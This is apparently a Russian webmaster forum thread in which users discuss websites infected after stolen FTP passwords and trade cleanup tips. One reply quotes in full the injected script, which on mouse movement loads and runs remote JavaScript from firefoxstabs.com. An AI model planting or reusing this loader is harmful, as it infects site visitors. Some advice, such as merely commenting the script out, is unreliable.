- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Ну вы даете! Весь ваш сайт у них в руках. Поздравляю! Как можно пароли сохранять где либо?
Лень и жадность убьет человечество, это точно.
С самого начала писал, что пароли от FTP стырили, а тут про DLE погнали) Вообщем фигня это, а не вирус. Удалите файлзилу вместе с папкой что в Application и ставьте тотал, ну и естественно пароли на фтп сменить.
Да уж система слежения спасла бы вас) но пока в разработке(
Ну вы даете! Весь ваш сайт у них в руках. Поздравляю! Как можно пароли сохранять где либо?
Лень и жадность убьет человечество, это точно.
Да не ) я не думаю что им наши сайты нужны, у них миллионы этих ФТП тыреться )
как вариант:
найдите все файлы, где прописался данный скрипт. Обычно это index, default, menu, header и все файлы .js
и закомментируйте его.
Для этого заходите на хост, архивируете все свои файлы в один архив .zip
Скачиваете себе на комп, разархивируете.
Потом врубаете программу MassTextProcessor (бесплатная)
и задаете ей команду все текстовые блоки
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>
поменять на
// <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>
После этого сколько бы он не ломился вам что-то менять, он видит свой собственный код и вас не трогает, хотя он уже и не работает
Так займитесь компьютером. Ваш антивирус есть иллюзия безопасности, нужны организационные меры, смена привычек, иначе ничего не поможет. АВ есть попытка догнать уходящее солнце, и если вы и далее на него будете надеяться, пользуясь прежними навыками обращения с техникой, боюсь, будут постоянные рецидивы.
Почистил комп доктор вэбом и сменил ФТП и геморой ушол)))
с такой же фигней столкнулся, комп чист, правда он у мене новый:) пару неделек и вирусняк похоже давно засел
на дле сайтах почистить js файлы в шаблоне, а движок заменить простым копированием
вот теперь надо понять вообще от меня вирус или нет
Чем дело то закончилось? У меня на двух хостингах все сайты упали! Как чистили сайтики? Поделитесь успешной кампанией! Либо я не все удаляю, либо червяк удалил что-то сам.
Одним словом Поделитесь лекарством от этой болезни...
Чем дело то закончилось? У меня на двух хостингах все сайты упали! Как чистили сайтики? Поделитесь успешной кампанией! Либо я не все удаляю, либо червяк удалил что-то сам.
Одним словом Поделитесь лекарством от этой болезни...
файлы движка js замените, если модули стоят дополнительные так же в js в ручную
еще я грешу на граббер который я запускал с хоста, взятый их паблика